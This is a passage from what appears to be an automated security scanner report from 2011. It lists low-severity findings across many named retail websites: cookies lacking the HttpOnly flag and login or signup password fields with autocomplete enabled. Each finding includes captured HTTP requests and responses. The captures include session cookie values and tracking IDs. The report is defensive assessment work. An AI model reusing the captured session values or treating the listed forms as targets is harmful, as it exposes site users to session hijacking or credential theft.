TS1c138a=7b67f70a184190a3c9165eedcfa7ec9d2efa223a5124b4964dd08bf9; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/promo.jsp?id=138040&&link=SFGalleryStore HTTP/1.1
Host: www.restorationhardware.com
Proxy-Connection: keep-alive
Referer: http://www.restorationhardware.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=b6e810b3b0486de55c7dc77610c783822efa223a5124b4964dd08831; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.2.10.1305509985; engagement=2; fsr.s={"v":1,"rid":"1305509997099_983249","pv":2,"to":5,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305510793290}; cmRS=&t1=1305510801743&t2=1305510806096&t3=1305511157555&t4=1305510793293&lti=1305511157555&ln=134006&hr=%3Fid%3D138040%26%26link%3DSFGalleryStore&fti=&fn=&ac=&fd=&uer=&fu=&pi=HOME%20PAGE&ho=cimg-1.restorationhardware.com/cm%3F&ci=90007517

Response

13.172. http://www.restorationhardware.com/sitewide/data/json/profile-status.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.restorationhardware.com
Path:	/sitewide/data/json/profile-status.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS1c138a=16ae58c88b9208479319a154d9def7682efa223a5124b4964dd08c04; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sitewide/data/json/profile-status.jsp?_=1305511158926 HTTP/1.1
Host: www.restorationhardware.com
Proxy-Connection: keep-alive
Referer: http://www.restorationhardware.com/content/promo.jsp?id=138040&&link=SFGalleryStore
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.2.10.1305509985; engagement=2; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; fsr.s={"v":1,"rid":"1305509997099_983249","pv":2,"to":5,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511158757}; fsr.a=1305511158906

Response

13.173. https://www.restorationhardware.com/my-account/forgot-password.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.restorationhardware.com
Path:	/my-account/forgot-password.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS1c138a=b72ce5406b61a765c4dbe2b4990160aa2efa223a5124b4964dd0ffea; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.174. https://www.restorationhardware.com/my-account/register.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.restorationhardware.com
Path:	/my-account/register.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS1c138a=c8ca4c79fc3e7bb28d932b5bb1dcf3292efa223a5124b4964dd101e1; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.175. https://www.restorationhardware.com/my-account/sign-in.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.restorationhardware.com
Path:	/my-account/sign-in.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS1c138a=ef27e626254569019b6a3249227030c92efa223a5124b4964dd08c1b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.176. https://www.restorationhardware.com/sitewide/data/json/profile-status.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.restorationhardware.com
Path:	/sitewide/data/json/profile-status.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS1c138a=5bd8da43812e2d44f3717ac9451ad5a82efa223a5124b4964dd08c2a; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.177. https://www.restorationhardware.com/sitewide/includes/header/expanding-banner-controller.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.restorationhardware.com
Path:	/sitewide/includes/header/expanding-banner-controller.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS1c138a=f5d76e447a12f51b020b9a893d636ab62efa223a5124b4964dd08c32; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.178. http://www.toshibadirect.com/td/b2c/laptops.to previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.toshibadirect.com
Path:	/td/b2c/laptops.to

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BV_IDS=cccdadfdidkkkjmcgfkceghdgngdglo.0:@@@@1110806401.1305542050@@@@;Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /td/b2c/laptops.to?page=segHHO HTTP/1.1
Host: www.toshibadirect.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tais.current.segment=HHO; BV_IDS=cccdadfdidkkkjmcgfkceghdgngdglo.0:@@@@1170188602.1305510022@@@@; s_vi=[CS]v1|26E84051851D3EE4-40000143C043A343[CE]; ysm_CK1K17SBM0N76O75C93SIIUNQINTO=ysm_PV1K17SBM0N76O75C93SIIUNQINTO:2&ysm_SN1K17SBM0N76O75C93SIIUNQINTO:1305510047274&ysm_LD1K17SBM0N76O75C93SIIUNQINTO:0; s_pers=%20s_vnum%3D1308102050353%2526vn%253D1%7C1308102050353%3B%20omtr_eVar45_cvp%3D%255B%255B'Direct%252520Load'%252C'1305510050403'%255D%255D%7C1463362850403%3B%20s_invisit%3Dtrue%7C1305513075995%3B%20omtr_lv%3D1305511275997%7C1400119275997%3B%20omtr_lv_s%3DFirst%2520Visit%7C1305513075997%3B%20s_nr%3D1305511275999%7C1308103275999%3B%20omtr_pv%3DSearch%253ALaptops%2520Home%2520Page%7C1305513076003%3B; s_sess=%20s_cc%3Dtrue%3B%20omtr_eVar49%3DD%253Dc49%3B%20s_ppv%3D34%3B%20SC_LINKS%3DSearch%253ALaptops%2520Home%2520Page%255E%255EMy%2520Account%255E%255ESearch%253ALaptops%2520Home%2520Page%2520%257C%2520My%2520Account%255E%255E%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3Dtoshibadirectprod%252Ctoshibaglobal%253D%252526pid%25253DSearch%2525253ALaptops%25252520Home%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.toshibadirect.com%2525252Ftd%2525252Fb2c%2525252Fmyaccount.to%252526ot%25253DA%3B

Response

13.179. http://www22.glam.com/cTagsImgCmd.act previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.glam.com
Path:	/cTagsImgCmd.act

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

glam_sid=115232130551023312111; expires=Wed, 15 May 2013 02:01:06 GMT; path=/; domain=.glam.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.180. http://www26.orientaltrading.com/cm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www26.orientaltrading.com
Path:	/cm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

90067112_reset=1305511271;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cm?tid=1&ci=90067112&vn2=e4.0&st=1305510857671&vn1=4.3.2&ec=utf-8&pi=HOME%20PAGE&cg=MAIN&pc=Y&rnd=1305520591450&ul=http%3A//www.orientaltrading.com/&lp=HOME%20PAGE HTTP/1.1
Host: www26.orientaltrading.com
Proxy-Connection: keep-alive
Referer: http://www.orientaltrading.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=17jLNQBXSqTLZLn22gSGhQZ1qn1JzhCKMpsNG12T0S6Y29Lzpcvx!-2120161015; otc_visitor_id=U6c411c8e35469d5c3d093388c1dc89a2; otc_new_mktg_visitor=21758503; CoreID6=30061305510207274874166; TestSess3=30061305510207274874166; CoreM_State=61~1.0~-1~-1~E~3~3~5~3~3~7~7~|~~|~~|~~|~||||||; 90067112_login=1305510217010072986690067112; 90067112_reset=1305510217; fsr.s={"v":1,"rid":"1305510222528_763877","pv":1,"to":3,"c":"http://www.orientaltrading.com/","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1305510848788}; mt.v=1.322159034.1305510206640; fsr.a=1305510862665

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:11 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 90067112_reset=1305511271;path=/
Expires: Sun, 15 May 2011 08:01:11 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

14. Password field with autocomplete enabled previous next
There are 46 instances of this issue:

https://ordering.ftd.com/new-signup/
https://ordering.ftd.com/new-signup/
https://ordering.ftd.com/new-signup/
https://ordering.ftd.com/new-signup/
https://ordering.ftd.com/reminder-signin/
https://ordering.ftd.com/reminder-signin/
https://ordering.ftd.com/reminder-signin/
https://ordering.ftd.com/reminder-signin/
https://ordering.ftd.com/reminder-signin/
https://ordering.ftd.com/signin/
https://ordering.ftd.com/signin/
https://ordering.ftd.com/signin/
https://ordering.ftd.com/signin/
https://secure.bhphotovideo.com/bnh/controller/home
https://secure.bhphotovideo.com/bnh/controller/home
https://secure.bluenile.com/accounts/account-sign-in.html
https://secure.bluenile.com/accounts/account-sign-in.html
https://secure.orientaltrading.com/ui/userProfile/processRequest.do
http://shoprunner.force.com/content/JsContentElementsGNC
http://shoprunner.force.com/content/JsContentElementsPET
https://www.acehardware.com/checkout/index.jsp
https://www.acehardware.com/checkout/index.jsp
https://www.armaniexchange.com/account/login.do
https://www.armaniexchange.com/account/login.do
http://www.bluefly.com/myfly/login.jsp
http://www.bluefly.com/myfly/login.jsp
http://www.footlocker.com/login/login_form.cfm
https://www.footlocker.com/account/default.cfm
https://www.footlocker.com/account/default/
http://www.ftd.com/
http://www.ftd.com/
http://www.ftd.com/
http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/
http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/
http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/
https://www.gnc.com/checkout/index.jsp
https://www.guitarcenter.com/MyAccount/Login.aspx
https://www.helzberg.com/account/login.do
https://www.orderhouse.com/default.aspx
https://www.orderhouse.com/dp.aspx
https://www.orderhouse.com/dp.aspx
https://www.petsmart.com/checkout/index.jsp
https://www.petsmart.com/checkout/index.jsp
https://www.redcrossstore.org/dp.aspx
https://www.restorationhardware.com/my-account/register.jsp
https://www.restorationhardware.com/my-account/sign-in.jsp

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

14.1. https://ordering.ftd.com/new-signup/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://ordering.ftd.com
Path:	/new-signup/

Issue detail

The page contains a form with the following action URL:

https://ordering.ftd.com/personal-info/

The form contains the following password fields with autocomplete enabled:

password
password_ver

Request

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:28:42 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 10:28:42 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 117006

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
</div>
   <form method='post' name='account_details' action='/personal-info/' style="margin-top: 0px;" onsubmit="if(document.account_details.email_isvalid.value == 1){return true;}else{valid_email(document.account_details.email.value, 1,'You have entered an invalid email address', function (){document.account_details.email_isvalid.value = 1;document.account_details.submit();});return false;}">
   <input type='hidden' name='AID' value="myaccount_create" />
...[SNIP]...
<span class='formw'>
               <input class="myaccount_info_form_input" type="password" name="password" maxlength="18" size="25" style="width:175;" value=''>
           </span>
...[SNIP]...
<span class='formw' style="padding-top: 2px;">
               <input class="myaccount_info_form_input" type="password" name="password_ver" maxlength="18" size="25" style="width:175px;" value=''>
           </span>
...[SNIP]...

14.2. https://ordering.ftd.com/new-signup/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://ordering.ftd.com
Path:	/new-signup/

Issue detail

The page contains a form with the following action URL:

https://ordering.ftd.com/new-signup/

The form contains the following password fields with autocomplete enabled:

password
password_ver

Request

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:28:42 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 10:28:42 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 117006

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div style="margin-bottom:20px; margin-top:15px;"><form name="create_account" id="create_account" method="post" action="" onsubmit="if(document.create_account.email_isvalid.value == 1){ FS.create_account(); }else{ valid_email(document.create_account.email.value, 1,'You have entered an invalid email address', function (){document.create_account.email_isvalid.value = 1; FS.create_account();});} return false;" style="margin:0px;"><table width="600" border="0" cellspacing="0" cellpadding="0">
...[SNIP]...
<td height="35" valign="middle"><input type="password" name="password" id="password" style="border:1px solid #d1bc61; width:200px; height:28px; padding:4px;" maxlength="18"/></td>
...[SNIP]...
<td height="35" valign="middle"><input type="password" name="password_ver" id="password_ver" style="border:1px solid #d1bc61; width:200px; height:28px; padding:4px;" maxlength="18"/></td>
...[SNIP]...

14.3. https://ordering.ftd.com/new-signup/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://ordering.ftd.com
Path:	/new-signup/

Issue detail

The page contains a form with the following action URL:

https://ordering.ftd.com/528/signin/

The form contains the following password field with autocomplete enabled:

password

Request

Response

14.4. https://ordering.ftd.com/new-signup/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://ordering.ftd.com
Path:	/new-signup/

Issue detail

The page contains a form with the following action URL:

https://ordering.ftd.com/528/signin/

The form contains the following password field with autocomplete enabled:

password

Request

Response

14.5. https://ordering.ftd.com/reminder-signin/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://ordering.ftd.com
Path:	/reminder-signin/

Issue detail

The page contains a form with the following action URL:

https://ordering.ftd.com/528/signin/

The form contains the following password field with autocomplete enabled:

password

Request

Response

14.6. https://ordering.ftd.com/reminder-signin/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://ordering.ftd.com
Path:	/reminder-signin/

Issue detail

The page contains a form with the following action URL:

https://ordering.ftd.com/reminder-signin/

The form contains the following password fields with autocomplete enabled:

password
password_confirm

Request

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:39:19 GMT
Server: Apache
Set-Cookie: auto_signed_out=; expires=Sat, 03 Jan 1970 05:00:02 GMT; path=/
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 10:39:20 GMT
Set-Cookie: pc1=%7b%7d; domain=.ftd.com; path=/; expires=Thu, 01 Jan 2099 05:00:00 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 98257

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<tr>
<form name="create_reminder_account" method="POST" action="/reminder-signin/" onsubmit="return reminder_signup();">
<input type="hidden" name="AID" value="bigdates" />
...[SNIP]...
<td>
<input type="password" name="password" size="15" maxlength="18" value=''/>
</td>
...[SNIP]...
<td>
<input type="password" name="password_confirm" size="15" maxlength="18" value='' />
</td>
...[SNIP]...

14.7. https://ordering.ftd.com/reminder-signin/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://ordering.ftd.com
Path:	/reminder-signin/

Issue detail

The page contains a form with the following action URL:

https://ordering.ftd.com/reminder-signin/

The form contains the following password field with autocomplete enabled:

password

Request

Response

14.8. https://ordering.ftd.com/reminder-signin/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://ordering.ftd.com
Path:	/reminder-signin/

Issue detail

The page contains a form with the following action URL:

https://ordering.ftd.com/reminder-signin/

The form contains the following password fields with autocomplete enabled:

password
password_ver

Request

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:39:19 GMT
Server: Apache
Set-Cookie: auto_signed_out=; expires=Sat, 03 Jan 1970 05:00:02 GMT; path=/
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 10:39:20 GMT
Set-Cookie: pc1=%7b%7d; domain=.ftd.com; path=/; expires=Thu, 01 Jan 2099 05:00:00 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 98257

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div style="margin-bottom:20px; margin-top:15px;"><form name="create_account" id="create_account" method="post" action="" onsubmit="if(document.create_account.email_isvalid.value == 1){ FS.create_account(); }else{ valid_email(document.create_account.email.value, 1,'You have entered an invalid email address', function (){document.create_account.email_isvalid.value = 1; FS.create_account();});} return false;" style="margin:0px;"><table width="600" border="0" cellspacing="0" cellpadding="0">
...[SNIP]...
<td height="35" valign="middle"><input type="password" name="password" id="password" style="border:1px solid #d1bc61; width:200px; height:28px; padding:4px;" maxlength="18"/></td>
...[SNIP]...
<td height="35" valign="middle"><input type="password" name="password_ver" id="password_ver" style="border:1px solid #d1bc61; width:200px; height:28px; padding:4px;" maxlength="18"/></td>
...[SNIP]...

14.9. https://ordering.ftd.com/reminder-signin/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://ordering.ftd.com
Path:	/reminder-signin/

Issue detail

The page contains a form with the following action URL:

https://ordering.ftd.com/528/signin/

The form contains the following password field with autocomplete enabled:

password

Request

Response

14.10. https://ordering.ftd.com/signin/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://ordering.ftd.com
Path:	/signin/

Issue detail

The page contains a form with the following action URL:

https://ordering.ftd.com/signin/

The form contains the following password fields with autocomplete enabled:

password
password_ver

Request

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:09:59 GMT
Server: Apache
Set-Cookie: track_id=baabe59f09870e0c5f1e6606009b9fb7e5a425b7fc231e55d6f4be1dbe08dc9c; expires=Thu, 13 May 2021 02:09:59 GMT; path=/; domain=.ftd.com
Set-Cookie: auto_signed_out=; expires=Sat, 03 Jan 1970 05:00:02 GMT; path=/
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 02:09:59 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 113972

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div style="margin-bottom:20px; margin-top:15px;"><form name="create_account" id="create_account" method="post" action="" onsubmit="if(document.create_account.email_isvalid.value == 1){ FS.create_account(); }else{ valid_email(document.create_account.email.value, 1,'You have entered an invalid email address', function (){document.create_account.email_isvalid.value = 1; FS.create_account();});} return false;" style="margin:0px;"><table width="600" border="0" cellspacing="0" cellpadding="0">
...[SNIP]...
<td height="35" valign="middle"><input type="password" name="password" id="password" style="border:1px solid #d1bc61; width:200px; height:28px; padding:4px;" maxlength="18"/></td>
...[SNIP]...
<td height="35" valign="middle"><input type="password" name="password_ver" id="password_ver" style="border:1px solid #d1bc61; width:200px; height:28px; padding:4px;" maxlength="18"/></td>
...[SNIP]...

14.11. https://ordering.ftd.com/signin/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://ordering.ftd.com
Path:	/signin/

Issue detail

The page contains a form with the following action URL:

https://ordering.ftd.com/signin/

The form contains the following password field with autocomplete enabled:

password

Request

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:09:59 GMT
Server: Apache
Set-Cookie: track_id=baabe59f09870e0c5f1e6606009b9fb7e5a425b7fc231e55d6f4be1dbe08dc9c; expires=Thu, 13 May 2021 02:09:59 GMT; path=/; domain=.ftd.com
Set-Cookie: auto_signed_out=; expires=Sat, 03 Jan 1970 05:00:02 GMT; path=/
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 02:09:59 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 113972

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
</p>
<form method='post' action="/signin/" name="sign_in" class='product_signinform' onsubmit="if(document.sign_in.email_isvalid.value == 1){return true;}else{valid_email(document.sign_in.email.value, 1,'You have entered an invalid email address', function (){document.sign_in.email_isvalid.value = 1;document.sign_in.submit();});return false;}">
<input type="hidden" name="AID" value="myaccount_signin" />
...[SNIP]...
<span><input type="password" name="password" maxlength="18" size="25" style="width:175px;" value=''/></span>
...[SNIP]...

14.12. https://ordering.ftd.com/signin/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://ordering.ftd.com
Path:	/signin/

Issue detail

The page contains a form with the following action URL:

https://ordering.ftd.com/528/signin/

The form contains the following password field with autocomplete enabled:

password

Request

Response

14.13. https://ordering.ftd.com/signin/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://ordering.ftd.com
Path:	/signin/

Issue detail

The page contains a form with the following action URL:

https://ordering.ftd.com/528/signin/

The form contains the following password field with autocomplete enabled:

password

Request

Response

14.14. https://secure.bhphotovideo.com/bnh/controller/home previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://secure.bhphotovideo.com
Path:	/bnh/controller/home

Issue detail

The page contains a form with the following action URL:

https://secure.bhphotovideo.com/bnh/controller/home?O=LogIn&A=logMeIn&Q=Login.jsp

The form contains the following password field with autocomplete enabled:

password

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Expires: Mon, 16 May 2011 11:06:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 11:06:56 GMT
Connection: keep-alive
Set-Cookie: JSESSIONID=nr1QNRFMzp!1551726241; domain=bhphotovideo.com; path=/
Set-Cookie: cookieID=18171364821305544044440; domain=bhphotovideo.com; expires=Saturday, 03-Jun-2079 14:21:31 GMT; path=/
Set-Cookie: TS20403f=b545291670a393ddc6eb9163287e33afe2a7ac07bec18dbf4dd10530; Path=/
Content-Length: 30873

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="/FrameWork/js/t
...[SNIP]...
</div>
   <form class="loginRegister" action="https://secure.bhphotovideo.com/bnh/controller/home?O=LogIn&A=logMeIn&Q=Login.jsp" method="post" name="login">

           <input type="hidden" name="originPage" value="cart.jsp"/>
...[SNIP]...
</label> <input name="password" type="password" maxlength="15" size="20"/></li>
...[SNIP]...

14.15. https://secure.bhphotovideo.com/bnh/controller/home previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://secure.bhphotovideo.com
Path:	/bnh/controller/home

Issue detail

The page contains a form with the following action URL:

https://secure.bhphotovideo.com/bnh/controller/home?O=Register&A=registerNewUser&Q=Login.jsp

The form contains the following password field with autocomplete enabled:

retypedNewPassword

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Expires: Mon, 16 May 2011 11:06:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 11:06:56 GMT
Connection: keep-alive
Set-Cookie: JSESSIONID=nr1QNRFMzp!1551726241; domain=bhphotovideo.com; path=/
Set-Cookie: cookieID=18171364821305544044440; domain=bhphotovideo.com; expires=Saturday, 03-Jun-2079 14:21:31 GMT; path=/
Set-Cookie: TS20403f=b545291670a393ddc6eb9163287e33afe2a7ac07bec18dbf4dd10530; Path=/
Content-Length: 30873

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="/FrameWork/js/t
...[SNIP]...
</form>

   <form class="loginRegister" name="Registration" id="Registration" class="basic" action="https://secure.bhphotovideo.com/bnh/controller/home?O=Register&A=registerNewUser&Q=Login.jsp" method="post" onsubmit="return validateRetypeEmail('emailAddress','retypeEmail')">


                                                                   <input type="hidden" name="prev_O" value='cart.jsp'/>
...[SNIP]...
</label><input name="retypedNewPassword" type="password" value="" maxlength="15" onpaste="return false;" size="20" /></li>
...[SNIP]...

14.16. https://secure.bluenile.com/accounts/account-sign-in.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://secure.bluenile.com
